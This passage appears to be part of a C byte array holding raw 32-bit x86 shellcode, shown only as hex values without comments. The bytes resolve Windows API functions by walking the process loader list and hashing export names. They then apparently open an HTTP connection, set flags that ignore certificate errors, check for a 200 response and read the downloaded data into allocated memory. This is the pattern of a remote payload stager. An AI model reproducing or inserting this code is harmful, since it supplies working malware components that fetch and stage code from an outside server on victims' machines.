288 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xec, 0x3e, 0x76, 0xcf, 0x8d,
289 0x95, 0x44, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0xc6, 0x00,
290 0x00, 0x8d, 0x85, 0x44, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0x8d,
291 0x45, 0x84, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24,
292 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xdb, 0xfc, 0xff, 0xff,
293 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81,
294 0xec, 0x98, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
295 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x19, 0x8b, 0x55, 0x0c,
296 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x4d, 0x84, 0x8b,
297 0x55, 0xec, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xec, 0x01, 0x8b, 0x55,
298 0x0c, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
299 0x06, 0x83, 0x7d, 0xec, 0x3f, 0x76, 0xd2, 0x8d, 0x55, 0x84, 0x8b, 0x45,
300 0xec, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x83, 0xe8, 0x04,
301 0x0f, 0xb6, 0x44, 0x05, 0x84, 0x3c, 0x2e, 0x74, 0x46, 0x8b, 0x45, 0xec,
302 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84, 0x2e, 0x8b,
303 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84,
304 0x64, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44,
305 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec,
306 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89,
307 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84, 0x00, 0xc7, 0x45, 0xc8, 0x18, 0x00,
308 0x00, 0x00, 0x8b, 0x45, 0xc8, 0x64, 0x8b, 0x00, 0x89, 0x45, 0xc4, 0x8b,
309 0x45, 0xc4, 0x8b, 0x40, 0x30, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x8b,
310 0x40, 0x0c, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x0c, 0x89,
311 0x45, 0xf4, 0xeb, 0x6e, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x89, 0x45,
312 0xe0, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xdc, 0x8b, 0x40,
313 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b,
314 0x45, 0xd8, 0x8b, 0x40, 0x78, 0x89, 0x45, 0xd4, 0x83, 0x7d, 0xd4, 0x00,
315 0x74, 0x37, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x89, 0x45,
316 0xd0, 0x8b, 0x45, 0xd0, 0x8b, 0x50, 0x0c, 0x8b, 0x45, 0xe0, 0x01, 0xd0,
317 0x89, 0x45, 0xcc, 0x8b, 0x45, 0xcc, 0x89, 0x44, 0x24, 0x04, 0x8d, 0x45,
318 0x84, 0x89, 0x04, 0x24, 0xe8, 0x0f, 0x47, 0x00, 0x00, 0x85, 0xc0, 0x74,
319 0x09, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xf0, 0xeb, 0x01, 0x90, 0x8b, 0x45,
320 0xf4, 0x8b, 0x00, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18,
321 0x85, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0x82, 0x83, 0x7d,
322 0xf0, 0x00, 0x75, 0x14, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x30, 0x8d, 0x55,
323 0x84, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf0,
324 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x81, 0xec,
325 0x40, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x89, 0x85, 0xe0, 0xfd, 0xff,
326 0xff, 0x8b, 0x45, 0x14, 0x89, 0x85, 0xe4, 0xfd, 0xff, 0xff, 0x8b, 0x45,
327 0x18, 0x89, 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x1c, 0x89, 0x85,
328 0xdc, 0xfd, 0xff, 0xff, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x8b,
329 0x45, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x3c, 0x89,
330 0xc2, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4,
331 0x83, 0xc0, 0x78, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x89,
332 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
333 0x00, 0xe9, 0xb6, 0x02, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8b, 0x45, 0xdc,
334 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x18, 0x89,
335 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
336 0x00, 0xe9, 0x92, 0x02, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x1c,
337 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xd8, 0x8b,
338 0x50, 0x20, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd0, 0x8b, 0x45,
339 0xd8, 0x8b, 0x50, 0x24, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xcc,
340 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x0c, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89,
341 0x45, 0xc8, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x21, 0x8b,
342 0x55, 0xc8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8,
343 0x20, 0x89, 0xc2, 0x8d, 0x8d, 0xb4, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf4,
344 0x01, 0xc8, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xc8, 0x8b,
345 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xd0, 0x8d,
346 0x95, 0xb4, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0xc6, 0x00,
347 0x00, 0x8b, 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x95, 0xdc, 0xfd, 0xff,
348 0xff, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x85, 0xb4,
349 0xfe, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xd7, 0x4b, 0x00, 0x00, 0x89,
350 0x45, 0xc0, 0x89, 0x55, 0xc4, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff,
351 0x3f, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x01,
352 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xbc, 0x8b,
353 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x95, 0xdc, 0xfd, 0xff, 0xff, 0x89,
354 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0xbc, 0x89, 0x04,
355 0x24, 0xe8, 0x94, 0x4b, 0x00, 0x00, 0x89, 0xc1, 0x33, 0x4d, 0xc0, 0x89,
356 0xce, 0x89, 0xd0, 0x33, 0x45, 0xc4, 0x89, 0xc7, 0x89, 0xf0, 0x33, 0x85,
357 0xe0, 0xfd, 0xff, 0xff, 0x89, 0x85, 0xd0, 0xfd, 0xff, 0xff, 0x89, 0xf8,
358 0x33, 0x85, 0xe4, 0xfd, 0xff, 0xff, 0x89, 0x85, 0xd4, 0xfd, 0xff, 0xff,
359 0x8b, 0x95, 0xd0, 0xfd, 0xff, 0xff, 0x8b, 0x8d, 0xd4, 0xfd, 0xff, 0xff,
360 0x89, 0xc8, 0x09, 0xd0, 0x85, 0xc0, 0x0f, 0x85, 0x55, 0x01, 0x00, 0x00,
361 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b,
362 0x45, 0xcc, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14,
363 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10,
364 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x3b,
365 0x45, 0xd8, 0x0f, 0x82, 0x18, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b,
366 0x50, 0x04, 0x8b, 0x45, 0xd8, 0x01, 0xd0, 0x39, 0x45, 0xec, 0x0f, 0x83,
367 0x04, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xb8, 0xc7, 0x45,
368 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2b, 0x8b, 0x55, 0xb8, 0x8b, 0x45,
369 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x74, 0xfe, 0xff, 0xff,
370 0x8b, 0x55, 0xf4, 0x01, 0xca, 0x88, 0x02, 0x8b, 0x55, 0xb8, 0x8b, 0x45,
371 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x1b, 0x83, 0x45,
372 0xf4, 0x01, 0x8b, 0x55, 0xb8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
373 0x00, 0x84, 0xc0, 0x74, 0x09, 0x83, 0x7d, 0xf4, 0x3b, 0x76, 0xc0, 0xeb,
374 0x01, 0x90, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x01, 0xc6, 0x84, 0x05, 0x74,
375 0xfe, 0xff, 0xff, 0x64, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x02, 0xc6, 0x84,
376 0x05, 0x74, 0xfe, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x03,
377 0xc6, 0x84, 0x05, 0x74, 0xfe, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xf4, 0x83,
378 0xc0, 0x04, 0xc6, 0x84, 0x05, 0x74, 0xfe, 0xff, 0xff, 0x00, 0x8b, 0x45,
379 0xf4, 0x83, 0xc0, 0x01, 0x01, 0x45, 0xb8, 0xc7, 0x45, 0xf4, 0x00, 0x00,
380 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xb8, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
381 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0xf4, 0xfd, 0xff, 0xff, 0x8b, 0x55, 0xf4,
382 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xb8, 0x8b,
383 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83,
384 0x7d, 0xf4, 0x7e, 0x76, 0xcf, 0x8d, 0x95, 0xf4, 0xfd, 0xff, 0xff, 0x8b,
385 0x45, 0xf4, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8d, 0x85, 0xf4, 0xfd, 0xff,
386 0xff, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x85, 0x74, 0xfe, 0xff, 0xff, 0x89,
387 0x44, 0x24, 0x08, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
388 0x08, 0x89, 0x04, 0x24, 0xe8, 0x5e, 0xf8, 0xff, 0xff, 0x89, 0x45, 0xec,
389 0x8b, 0x45, 0xec, 0xeb, 0x17, 0x83, 0x6d, 0xf0, 0x01, 0x83, 0x7d, 0xf0,
390 0x00, 0x74, 0x0a, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0x18, 0xfe, 0xff,
391 0xff, 0x8b, 0x45, 0xec, 0x81, 0xc4, 0x40, 0x02, 0x00, 0x00, 0x5e, 0x5f,
392 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x58, 0x8b, 0x45, 0x0c, 0x89,
393 0x45, 0xd0, 0x8b, 0x45, 0x10, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0x14, 0x89,
394 0x45, 0xc8, 0x8b, 0x45, 0x18, 0x89, 0x45, 0xcc, 0xc7, 0x45, 0xf0, 0x00,
395 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe4, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x45,
396 0xe4, 0x64, 0x8b, 0x00, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x40,
397 0x30, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x8b, 0x40, 0x0c, 0x89, 0x45,
398 0xe8, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf4, 0xeb, 0x3c,
399 0x8b, 0x45, 0xf4, 0x8b, 0x48, 0x18, 0x8b, 0x45, 0xc8, 0x8b, 0x55, 0xcc,
400 0x89, 0x44, 0x24, 0x10, 0x89, 0x54, 0x24, 0x14, 0x8b, 0x45, 0xd0, 0x8b,
401 0x55, 0xd4, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x0c, 0x89, 0x4c,
402 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x50, 0xfc, 0xff,
403 0xff, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x45, 0xf4,
404 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x06, 0x83, 0x7d,
405 0xf0, 0x00, 0x74, 0xb4, 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5,
406 0x57, 0x56, 0x53, 0x81, 0xec, 0x5c, 0x03, 0x00, 0x00, 0xc7, 0x45, 0xe4,
407 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x90, 0x00, 0x00, 0x00, 0x00, 0xc7,
408 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00,
409 0x00, 0xc7, 0x45, 0xd4, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
410 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89,
411 0x45, 0xd0, 0xc7, 0x45, 0xdc, 0x00, 0x03, 0x60, 0x04, 0xc7, 0x44, 0x24,
412 0x08, 0x3c, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
413 0x00, 0x8d, 0x85, 0x54, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xfd,
414 0x40, 0x00, 0x00, 0xc7, 0x85, 0x54, 0xff, 0xff, 0xff, 0x3c, 0x00, 0x00,
415 0x00, 0x8d, 0x85, 0x50, 0xfe, 0xff, 0xff, 0x89, 0x85, 0x64, 0xff, 0xff,
416 0xff, 0xc7, 0x85, 0x68, 0xff, 0xff, 0xff, 0x04, 0x01, 0x00, 0x00, 0x8d,
417 0x85, 0x4c, 0xfd, 0xff, 0xff, 0x89, 0x45, 0x80, 0xc7, 0x45, 0x84, 0x04,
418 0x01, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0xfd, 0xff, 0xff, 0x89, 0x85, 0x70,
419 0xff, 0xff, 0xff, 0xc7, 0x85, 0x74, 0xff, 0xff, 0xff, 0x40, 0x00, 0x00,
420 0x00, 0x8d, 0x85, 0xcc, 0xfc, 0xff, 0xff, 0x89, 0x85, 0x78, 0xff, 0xff,
421 0xff, 0xc7, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x40, 0x00, 0x00, 0x00, 0x8b,
422 0x45, 0x08, 0x8b, 0x80, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d,
423 0x8a, 0xf8, 0x08, 0x00, 0x00, 0x8d, 0x95, 0x54, 0xff, 0xff, 0xff, 0x89,
424 0x54, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x10, 0xc7,
425 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x0c, 0x24, 0xff, 0xd0,
426 0x83, 0xec, 0x10, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
427 0xe9, 0x58, 0x06, 0x00, 0x00, 0x8b, 0x85, 0x60, 0xff, 0xff, 0xff, 0x83,
428 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xd8, 0x83,
429 0x7d, 0xd8, 0x00, 0x74, 0x14, 0x81, 0x4d, 0xdc, 0x00, 0x00, 0x80, 0x00,
430 0x83, 0x7d, 0xd4, 0x00, 0x74, 0x07, 0x81, 0x4d, 0xdc, 0x00, 0x30, 0x00,
431 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xac, 0x00, 0x00, 0x00, 0xc7, 0x44,
432 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00,
433 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
434 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00,
435 0x00, 0xff, 0xd0, 0x83, 0xec, 0x14, 0x89, 0x45, 0xcc, 0x83, 0x7d, 0xcc,
436 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe4, 0x05, 0x00,
437 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x0f, 0xb7,
438 0x95, 0x6c, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0xd2, 0xc7, 0x44, 0x24, 0x1c,
439 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00,
440 0xc7, 0x44, 0x24, 0x14, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10,
441 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
442 0x89, 0x54, 0x24, 0x08, 0x8d, 0x95, 0x50, 0xfe, 0xff, 0xff, 0x89, 0x54,
443 0x24, 0x04, 0x8b, 0x55, 0xcc, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
444 0x20, 0x89, 0x45, 0xc8, 0x83, 0x7d, 0xc8, 0x00, 0x0f, 0x84, 0xb6, 0x04,
445 0x00, 0x00, 0x8b, 0x45, 0x84, 0x85, 0xc0, 0x75, 0x0e, 0xc6, 0x85, 0x4c,
446 0xfd, 0xff, 0xff, 0x2f, 0xc6, 0x85, 0x4d, 0xfd, 0xff, 0xff, 0x00, 0x8b,
447 0x45, 0x08, 0x8b, 0x80, 0xc4, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c,
448 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xdc, 0x89, 0x54, 0x24, 0x18, 0xc7,
449 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
450 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d,
451 0x95, 0x4c, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
452 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc8, 0x89, 0x14, 0x24, 0xff,
453 0xd0, 0x83, 0xec, 0x20, 0x89, 0x45, 0xc4, 0x83, 0x7d, 0xc4, 0x00, 0x0f,
454 0x84, 0x33, 0x04, 0x00, 0x00, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x45, 0x8b,
455 0x45, 0xdc, 0x25, 0x00, 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x39, 0xc7,
456 0x45, 0xc0, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x9c, 0x80, 0x33, 0x00,
457 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb4, 0x00, 0x00, 0x00, 0xc7, 0x44,
458 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x9c, 0x89, 0x54, 0x24,
459 0x08, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4,
460 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x8b, 0x85, 0x74, 0xff,
461 0xff, 0xff, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb4,
462 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x95, 0x70,
463 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7,
464 0x44, 0x24, 0x04, 0x1c, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14,
465 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xe0, 0x8b, 0x85, 0x7c,
466 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x45, 0x08, 0x8b, 0x80,
467 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x7c, 0xff, 0xff, 0xff, 0x8b, 0x95,
468 0x78, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08,
469 0xc7, 0x44, 0x24, 0x04, 0x1d, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89,
470 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xe0, 0x8b, 0x45,
471 0x08, 0x8b, 0x80, 0xc8, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
472 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7,
473 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00,
474 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
475 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x84, 0x47, 0x02, 0x00, 0x00, 0xc7, 0x45,
476 0x94, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x90, 0x00, 0x00, 0x00, 0x00,
477 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xcc, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
478 0x10, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x94, 0x89, 0x54, 0x24, 0x0c,
479 0x8d, 0x55, 0x90, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x13,
480 0x00, 0x00, 0x20, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
481 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x84, 0xff, 0x01, 0x00, 0x00, 0x8b, 0x45,
482 0x90, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0xf1, 0x01, 0x00, 0x00,
483 0xc7, 0x45, 0x94, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x00, 0x00,
484 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xcc, 0x00, 0x00, 0x00, 0xc7,
485 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x94, 0x89, 0x54,
486 0x24, 0x0c, 0x8d, 0x55, 0xa0, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
487 0x04, 0x05, 0x00, 0x00, 0x20, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff,
488 0xd0, 0x83, 0xec, 0x14, 0x89, 0x45, 0xbc, 0x83, 0x7d, 0xbc, 0x00, 0x0f,
489 0x85, 0x2d, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x7c, 0xff,
490 0xd0, 0x3d, 0x76, 0x2f, 0x00, 0x00, 0x0f, 0x85, 0x91, 0x01, 0x00, 0x00,
491 0xc7, 0x45, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80,
492 0xc0, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
493 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xa4, 0x89,
494 0x54, 0x24, 0x04, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
495 0xec, 0x10, 0x89, 0x45, 0xbc, 0x83, 0x7d, 0xbc, 0x00, 0x0f, 0x84, 0x52,
496 0x01, 0x00, 0x00, 0x8b, 0x45, 0xa4, 0x85, 0xc0, 0x0f, 0x84, 0x47, 0x01,
497 0x00, 0x00, 0x83, 0x7d, 0xe4, 0x00, 0x75, 0x3f, 0x8b, 0x45, 0x08, 0x8b,
498 0x58, 0x6c, 0x8b, 0x45, 0xa4, 0x89, 0x85, 0xc4, 0xfc, 0xff, 0xff, 0x8b,
499 0x45, 0x08, 0x8b, 0x40, 0x74, 0xff, 0xd0, 0x8b, 0x8d, 0xc4, 0xfc, 0xff,
500 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00,
501 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xe4,
502 0x83, 0x7d, 0xe4, 0x00, 0x75, 0x4f, 0xe9, 0x02, 0x01, 0x00, 0x00, 0x8b,
503 0x45, 0x08, 0x8b, 0x58, 0x70, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0xa4, 0x01,
504 0xd0, 0x89, 0x85, 0xc4, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x40,
505 0x74, 0xff, 0xd0, 0x8b, 0x8d, 0xc4, 0xfc, 0xff, 0xff, 0x89, 0x4c, 0x24,
506 0x0c, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04,
507 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x10,
508 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xb7, 0x00, 0x00,
509 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x55,
510 0xa4, 0x8b, 0x5d, 0xa0, 0x8b, 0x4d, 0xe4, 0x01, 0xcb, 0x8d, 0x4d, 0x98,
511 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
512 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
513 0x45, 0xbc, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0xa4, 0x01, 0xd0, 0x89, 0x45,
